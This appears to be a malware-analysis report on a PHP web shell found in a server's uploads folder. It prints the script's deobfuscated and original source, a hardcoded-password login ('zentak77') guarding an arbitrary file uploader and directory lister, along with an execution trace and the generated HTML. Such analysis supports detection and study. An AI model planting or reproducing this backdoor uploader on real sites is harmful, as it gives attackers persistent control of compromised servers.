Screenshot
Attributes
Files
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original, Traces)

URLs
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd (Deobfuscated, Original)

Deobfuscated PHP code
<?php

$pass = "zentak77";
session_start();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
<?php 
if (!empty($_GET['action']) && $_GET['action'] == "logout") {
    session_destroy();
    unset($_SESSION['pass']);
}
$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
if (empty($_SESSION['pass'])) {
    $_SESSION['pass'] = '';
}
if (empty($_POST['pass'])) {
    $_POST['pass'] = '';
}
if ($_SESSION['pass'] !== $pass) {
    if ($_POST['pass'] == $pass) {
        $_SESSION['pass'] = $pass;
    } else {
        echo '<form action="' . $_SERVER['PHP_SELF'] . '" method="post"><input name="pass" type="password"><input type="submit"></form>';
        exit;
    }
}
?>


<form enctype="multipart/form-data" action="<?php 
echo $_SERVER['PHP_SELF'];
?>" method="POST">
Please choose a file: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>


<?php 
if (!empty($_FILES["file"])) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Error: " . $_FILES["file"]["error"] . "<br>";
    } else {
        echo "Stored file:" . $_FILES["file"]["name"] . "<br/>Size:" . $_FILES["file"]["size"] / 1024 . " kB<br/>";
        move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    }
}
// open this directory
$myDirectory = opendir(".");
// get each entry
while ($entryName = readdir($myDirectory)) {
    $dirArray[] = $entryName;
}
closedir($myDirectory);
$indexCount = count($dirArray);
echo "{$indexCount} files<br/>";
sort($dirArray);
echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";
for ($index = 0; $index < $indexCount; $index++) {
    if (substr("{$dirArray[$index]}", 0, 1) != ".") {
        echo "<TR>\r\n            <td><a href=\"{$dirArray[$index]}\">{$dirArray[$index]}</a></td>\r\n            <td>" . filetype($dirArray[$index]) . "</td>\r\n            <td>" . filesize($dirArray[$index]) . "</td>\r\n                </TR>";
    }
}
echo "</TABLE>";
Execution traces
data/traces/4db1d6f3393e958b7767f13b85b5c510_trace-1676245373.4875.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:43:19.385330]
1	0	1	0.000137	393528
1	3	0	0.000260	407392	{main}	1		/var/www/html/uploads/zentak77.php	0	0
1		A						/var/www/html/uploads/zentak77.php	2	$pass = 'zentak77'
2	4	0	0.000290	407392	session_start	0		/var/www/html/uploads/zentak77.php	3	0
2	4	1	0.000343	408144
2	4	R			TRUE
2	5	0	0.000361	408144	pathinfo	0		/var/www/html/uploads/zentak77.php	10	1	'/uploads/zentak77.php'
2	5	1	0.000378	408856
2	5	R			['dirname' => '/uploads', 'basename' => 'zentak77.php', 'extension' => 'php', 'filename' => 'zentak77']
1		A						/var/www/html/uploads/zentak77.php	10	$path_name = ['dirname' => '/uploads', 'basename' => 'zentak77.php', 'extension' => 'php', 'filename' => 'zentak77']
1		A						/var/www/html/uploads/zentak77.php	11	$this_script = 'zentak77.php'
1		A						/var/www/html/uploads/zentak77.php	12	_SESSION['pass'] = ''
1		A						/var/www/html/uploads/zentak77.php	13	_POST['pass'] = ''
			0.000481	330152
TRACE END   [2023-02-12 21:43:19.385702]

Generated HTML code
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"></head><body>
<form action="/zentak77.php" method="post"><input name="pass" type="password"><input type="submit"></form></body></html>
Original PHP code
<?php
$pass = "zentak77";
session_start();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
<?php
if (!empty($_GET['action']) &&  $_GET['action'] == "logout") {session_destroy();unset ($_SESSION['pass']);}

$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
if (empty($_SESSION['pass'])) {$_SESSION['pass']='';}
if (empty($_POST['pass'])) {$_POST['pass']='';}
if ( $_SESSION['pass']!== $pass) 
{
    if ($_POST['pass'] == $pass) {$_SESSION['pass'] = $pass; }
    else 
    {
        echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><input name="pass" type="password"><input type="submit"></form>';
        exit;
    }
}
?>


<form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
Please choose a file: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>


<?php 

if (!empty($_FILES["file"]))
{
    if ($_FILES["file"]["error"] > 0)
       {echo "Error: " . $_FILES["file"]["error"] . "<br>";}
    else
       {echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";
       move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
       }
}

    // open this directory 
    $myDirectory = opendir(".");
    // get each entry
    while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
    $indexCount = count($dirArray);
        echo "$indexCount files<br/>";
    sort($dirArray);

    echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";

        for($index=0; $index < $indexCount; $index++) 
        {
            if (substr("$dirArray[$index]", 0, 1) != ".")
            {
            echo "<TR>
            <td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
            <td>".filetype($dirArray[$index])."</td>
            <td>".filesize($dirArray[$index])."</td>
                </TR>";
            }
        }
    echo "</TABLE>";
    ?>